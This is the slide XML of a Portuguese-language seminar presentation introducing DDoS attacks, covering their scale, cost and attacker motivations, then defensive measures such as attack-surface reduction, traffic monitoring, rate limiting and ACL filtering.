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image" Target="../media/image-13-26.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image-13-27.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image-13-28.png"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image-13-29.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image-13-30.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image-13-31.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image-13-32.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image-13-33.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image-13-34.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image-13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435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Introdução ao DDoS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Compreendendo a anatomia dos ataques distribuídos de negação de serviço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685925"/>
            <a:ext cx="4143375" cy="134302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685925"/>
            <a:ext cx="28575" cy="134302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1828800"/>
            <a:ext cx="3929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DDoS?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28625" y="2164556"/>
            <a:ext cx="15398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511169" y="2164556"/>
            <a:ext cx="5669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istributed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006711" y="2164556"/>
            <a:ext cx="15398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1089254" y="2164556"/>
            <a:ext cx="34468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enial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1362503" y="2164556"/>
            <a:ext cx="14125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432322" y="2164556"/>
            <a:ext cx="1349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1495834" y="2164556"/>
            <a:ext cx="1476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1572071" y="2164556"/>
            <a:ext cx="3763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ervice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428625" y="2371725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 coordenado que utiliza múltiplas máquinas comprometidas para sobrecarregar recursos de um alvo, tornando-o indisponível para usuários legítimos.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285750" y="3200400"/>
            <a:ext cx="4214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 e Relevância</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1125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529013"/>
            <a:ext cx="142875" cy="14287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42925" y="3536156"/>
            <a:ext cx="137366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Crescimento alarmante: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1845152" y="3536156"/>
            <a:ext cx="2494452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de 1.2 Tbps (2016) → 3.8 Tbps (2024)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody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900488"/>
            <a:ext cx="89297" cy="14287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89347" y="3821906"/>
            <a:ext cx="8016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 médio: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489347" y="3821906"/>
            <a:ext cx="357840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US$ 20,000 a US$ 40,000 por hora para empresas de médio/grande porte</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="9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271963"/>
            <a:ext cx="142875" cy="1428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542925" y="4279106"/>
            <a:ext cx="71928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Frequência:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Text 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1190774" y="4279106"/>
            <a:ext cx="3108536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Mais de 1,000 ataques significativos diariamente no mundo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Text 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4714875" y="1685925"/>
            <a:ext cx="42148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Motivações dos Atacantes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1125" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Shape 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4714875" y="2000250"/>
            <a:ext cx="2014538" cy="7429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2143125"/>
            <a:ext cx="128588" cy="114300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5014913" y="2114550"/>
            <a:ext cx="6431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Financeira</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Text 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4829175" y="2343150"/>
            <a:ext cx="1857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Extorsão, competição desleal, serviços DDoS-for-hire</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Shape 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6843713" y="2000250"/>
            <a:ext cx="2014538" cy="7429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013" y="2143125"/>
            <a:ext cx="100013" cy="114300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7115175" y="2114550"/>
            <a:ext cx="6366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Ideológica</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="Text 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6958013" y="2343150"/>
            <a:ext cx="1857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Hacktivismo, protestos digitais, causas políticas</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="Shape 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4714875" y="2857500"/>
            <a:ext cx="2014538" cy="7429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4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3000375"/>
            <a:ext cx="114300" cy="114300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5000625" y="2971800"/>
            <a:ext cx="577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Vingança</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="Text 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4829175" y="3200400"/>
            <a:ext cx="1857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Ex-funcionários, clientes insatisfeitos, concorrentes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="Shape 35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6843713" y="2857500"/>
            <a:ext cx="2014538" cy="7429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013" y="3000375"/>
            <a:ext cx="85725" cy="11430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7100888" y="2971800"/>
            <a:ext cx="1100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Guerra Cibernética</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="Text 37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6958013" y="3200400"/>
            <a:ext cx="1857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Operações patrocinadas por estados, desestabilização</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48" name="Shape 38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4714875" y="3771900"/>
            <a:ext cx="4143375" cy="12573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49" name="Shape 39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4714875" y="3771900"/>
            <a:ext cx="28575" cy="12573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0" name="Text 40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4829175" y="3886200"/>
            <a:ext cx="39862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Objetivos do Seminário</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1125" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="Text 41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4972050" y="4143375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Compreender a anatomia completa dos ataques DDoS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52" name="Text 42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4972050" y="4343400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Analisar técnicas avançadas e tendências recentes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53" name="Text 43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4972050" y="4543425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Explorar exemplos práticos (fins educacionais)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54" name="Text 44"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4972050" y="4743450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Discutir estratégias eficazes de mitigação e defesa</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55" name="Shape 45"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="531495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56" name="Text 46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="285750" y="540067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57" name="Text 47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8413412" y="540067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1/14</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="7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0299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 e Defesa: Estratégias de Primeira Linha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Medidas fundamentais para proteção contra ataques DDoS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71625"/>
            <a:ext cx="8158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proteção eficaz contra DDoS exige uma abordagem em camadas, começando com medidas fundamentais que podem ser implementadas na própria infraestrutura da organização.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285750" y="2200275"/>
            <a:ext cx="4200525" cy="281463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28625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2436019"/>
            <a:ext cx="171450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2969" y="2343150"/>
            <a:ext cx="23367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Redução da Superfície de Ataque</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1125" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Shape 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3215469" y="2364581"/>
            <a:ext cx="547948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3215469" y="2364581"/>
            <a:ext cx="61938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Preventiva</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Text 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="892969" y="2571750"/>
            <a:ext cx="294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Minimizar pontos de entrada potenciais</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788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2828925"/>
            <a:ext cx="100013" cy="10001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2988" y="2800350"/>
            <a:ext cx="20003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Desativar serviços e portas desnecessários</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788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" y="3028950"/>
            <a:ext cx="100013" cy="10001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42988" y="3000375"/>
            <a:ext cx="22170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Restringir acesso administrativo a IPs confiáveis</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788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" y="3228975"/>
            <a:ext cx="100013" cy="10001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42988" y="3200400"/>
            <a:ext cx="17391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Aplicar o princípio do menor privilégio</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788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25" y="3429000"/>
            <a:ext cx="100013" cy="100013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042988" y="3400425"/>
            <a:ext cx="190034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Consolidar serviços em menos endpoints</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Shape 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="885825" y="3629025"/>
            <a:ext cx="3457575" cy="4000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29" name="Text 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="971550" y="3714750"/>
            <a:ext cx="3357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i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"Cada serviço exposto é um potencial alvo. Reduza sua superfície de ataque para concentrar seus recursos de defesa onde realmente importa."</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Shape 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4657725" y="2200275"/>
            <a:ext cx="4200525" cy="281463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1" name="Shape 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4800600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9" y="2436019"/>
            <a:ext cx="171450" cy="17145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264944" y="2343150"/>
            <a:ext cx="17697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Monitoramento Contínuo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1125" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Shape 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7020409" y="2364581"/>
            <a:ext cx="495514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35" name="Text 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7020409" y="2364581"/>
            <a:ext cx="566951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</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Text 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5264944" y="2571750"/>
            <a:ext cx="23224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Visibilidade sobre padrões de tráfego</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Text 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5257800" y="280035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Utilize ferramentas e protocolos para obter visibilidade sobre os padrões de tráfego da rede:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="Shape 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5257800" y="3228975"/>
            <a:ext cx="1685925" cy="5429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9" name="Text 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5314950" y="3286125"/>
            <a:ext cx="16430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NetFlow/sFlow</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="Text 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5314950" y="3486150"/>
            <a:ext cx="1643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Coleta de dados de fluxo para análise de tráfego em larga escala</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="Shape 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7029450" y="3228975"/>
            <a:ext cx="1685925" cy="5429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42" name="Text 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7086600" y="3286125"/>
            <a:ext cx="16430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SNMP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="Text 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7086600" y="3486150"/>
            <a:ext cx="1643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Monitoramento de dispositivos de rede e métricas de tráfego</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="Text 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5257800" y="3857625"/>
            <a:ext cx="35290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Estabeleça uma linha de base (baseline) do tráfego normal para detectar anomalias que possam indicar o início de um ataque.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="Shape 35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5257800" y="4200525"/>
            <a:ext cx="3457575" cy="6572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46" name="Text 36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5343525" y="428625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Métricas Essenciais</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="Text 37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5343525" y="4486275"/>
            <a:ext cx="16859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Bits por segundo (bps)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48" name="Text 38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7015163" y="4486275"/>
            <a:ext cx="16859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Pacotes por segundo (pps)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49" name="Text 39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5343525" y="4657725"/>
            <a:ext cx="16859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Conexões por segundo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50" name="Text 40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7015163" y="4657725"/>
            <a:ext cx="16859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Distribuição de protocolos</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="Shape 41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="285750" y="5172075"/>
            <a:ext cx="4200525" cy="27860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52" name="Shape 42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="428625" y="53149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5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78" y="5407819"/>
            <a:ext cx="192881" cy="171450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54" name="Text 43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="892969" y="5314950"/>
            <a:ext cx="12995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Limitação de Taxa</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1125" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55" name="Shape 44"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2178230" y="5336381"/>
            <a:ext cx="509662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6" name="Text 45"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2178230" y="5336381"/>
            <a:ext cx="581099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</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57" name="Text 46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="892969" y="5543550"/>
            <a:ext cx="18663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Controle de volume de tráfego</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58" name="Text 47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="885825" y="577215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Configure limites na quantidade de tráfego ou número de conexões permitidas por origem ou por conexão:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody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" y="6229350"/>
            <a:ext cx="50006" cy="100013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992981" y="6200775"/>
            <a:ext cx="20874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 de requisições por IP (ex: 100 req/min)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6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825" y="6429375"/>
            <a:ext cx="50006" cy="100013"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62" name="Text 49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="992981" y="6400800"/>
            <a:ext cx="19838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 de conexões simultâneas por cliente</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6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825" y="6629400"/>
            <a:ext cx="50006" cy="100013"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64" name="Text 50"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="992981" y="6600825"/>
            <a:ext cx="17782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 de largura de banda por serviço</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65" name="Shape 51"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="885825" y="6829425"/>
            <a:ext cx="3457575" cy="5429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66" name="Text 52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="971550" y="6924080"/>
            <a:ext cx="72408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Implementação:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67" name="Text 53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="971550" y="6924080"/>
            <a:ext cx="3030457" cy="2089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Pode ser configurada em firewalls, balanceadores de carga, servidores web (nginx, Apache) e CDNs.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6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550" y="7181255"/>
            <a:ext cx="85725" cy="85725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69" name="Text 54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1085850" y="7181255"/>
            <a:ext cx="230623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Menos eficaz contra ataques distribuídos em larga escala.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70" name="Shape 55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4657725" y="5172075"/>
            <a:ext cx="4200525" cy="27860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1" name="Shape 56"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4800600" y="53149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7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3469" y="5407819"/>
            <a:ext cx="171450" cy="171450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73" name="Text 57"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5264944" y="5314950"/>
            <a:ext cx="14766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Filtragem de Tráfego</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1125" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="74" name="Shape 58"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6727348" y="5336381"/>
            <a:ext cx="509662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5" name="Text 59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6727348" y="5336381"/>
            <a:ext cx="581099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</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76" name="Text 60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5264944" y="5543550"/>
            <a:ext cx="20435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Bloqueio de tráfego malicioso</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77" name="Text 61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5257800" y="5772150"/>
            <a:ext cx="3529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Implemente regras de filtragem em roteadores e firewalls:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="78" name="Shape 62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5257800" y="6029325"/>
            <a:ext cx="3457575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79" name="Text 63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5314950" y="6086475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ACLs (Listas de Controle de Acesso)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
